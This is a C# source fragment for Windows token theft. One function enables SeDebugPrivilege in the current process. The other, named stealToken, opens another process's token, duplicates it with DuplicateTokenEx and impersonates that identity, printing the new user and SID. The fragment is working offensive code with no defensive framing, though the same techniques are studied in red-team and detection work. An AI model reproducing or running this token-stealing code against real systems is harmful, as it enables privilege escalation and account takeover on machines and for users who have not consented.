private static IntPtr enableSEDebugPrivilege()
{
IntPtr hToken = IntPtr.Zero;
WindowsAPIHelper.LUID luidSEDebugNameValue;
WindowsAPIHelper.TOKEN_PRIVILEGES tkpPrivileges;
if (!WindowsAPIHelper.OpenProcessToken(WindowsAPIHelper.GetCurrentProcess(), (uint)WindowsAPIHelper.DesiredAccess.TOKEN_ADJUST_PRIVILEGES | (uint)WindowsAPIHelper.DesiredAccess.TOKEN_QUERY, out hToken))
{
Console.WriteLine("OpenProcessToken() failed, error = {0} . SeDebugPrivilege is not available", Marshal.GetLastWin32Error());
return(IntPtr.Zero);
}
else
{
Console.WriteLine("OpenProcessToken() successfully");
}
if (!WindowsAPIHelper.LookupPrivilegeValue(null, WindowsAPIHelper.PrivilegeName.SE_DEBUG_NAME, out luidSEDebugNameValue))
{
Console.WriteLine("LookupPrivilegeValue() failed, error = {0} .SeDebugPrivilege is not available", Marshal.GetLastWin32Error());
WindowsAPIHelper.CloseHandle(hToken);
return(IntPtr.Zero);
}
else
{
Console.WriteLine("LookupPrivilegeValue() successfully");
}
tkpPrivileges.PrivilegeCount = 1;
tkpPrivileges.Luid = luidSEDebugNameValue;
tkpPrivileges.Attributes = WindowsAPIHelper.PrivilegeName.SE_PRIVILEGE_ENABLED;
if (!WindowsAPIHelper.AdjustTokenPrivileges(hToken, false, ref tkpPrivileges, 0, IntPtr.Zero, IntPtr.Zero))
{
Console.WriteLine("LookupPrivilegeValue() failed, error = {0} .SeDebugPrivilege is not available", Marshal.GetLastWin32Error());
}
else
{
Console.WriteLine("SeDebugPrivilege is now available");
}
return(hToken);
}
static void stealToken(ref IntPtr token, int SecurityImpersonate, ref IntPtr duplicateToken)
{
//Check for Debugging
Console.WriteLine("Current User: {0}", WindowsIdentity.GetCurrent().Name);
IntPtr hToken = enableSEDebugPrivilege();
IntPtr hHandle = attachProcess();
WindowsAPIHelper.OpenProcessToken(hHandle, (uint)WindowsAPIHelper.DesiredAccess.TOKEN_MAXIMUM_ALLOWED, out token);
WindowsAPIHelper.SECURITY_ATTRIBUTES sa = new WindowsAPIHelper.SECURITY_ATTRIBUTES();
Console.WriteLine("Stealing token...");
//Token Type needs to be Primary if launching a new process, Impersonation if changing ThreadToken (Possibly? How true is this?)
if (WindowsAPIHelper.DuplicateTokenEx(token, (uint)WindowsAPIHelper.DesiredAccess.TOKEN_MAXIMUM_ALLOWED, ref sa, WindowsAPIHelper.SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, WindowsAPIHelper.TOKEN_TYPE.TokenImpersonation, out duplicateToken))
{
if (duplicateToken == IntPtr.Zero)
{
Console.WriteLine("Failed");
return;
}
WindowsIdentity impersonatedUser = new WindowsIdentity(duplicateToken);
//Run commands using that tokens Impersonation Context.
using (WindowsImpersonationContext ImpersonationContext = impersonatedUser.Impersonate())
{
if (ImpersonationContext != null)
{
Console.WriteLine("After Impersonation Succeeded!\nUser: {0}\nSID: {1}", WindowsIdentity.GetCurrent(TokenAccessLevels.MaximumAllowed).Name, WindowsIdentity.GetCurrent(TokenAccessLevels.MaximumAllowed).User.Value);
}
}
}
else
{
Console.WriteLine("Unable to duplicate token!");
return;
}
}
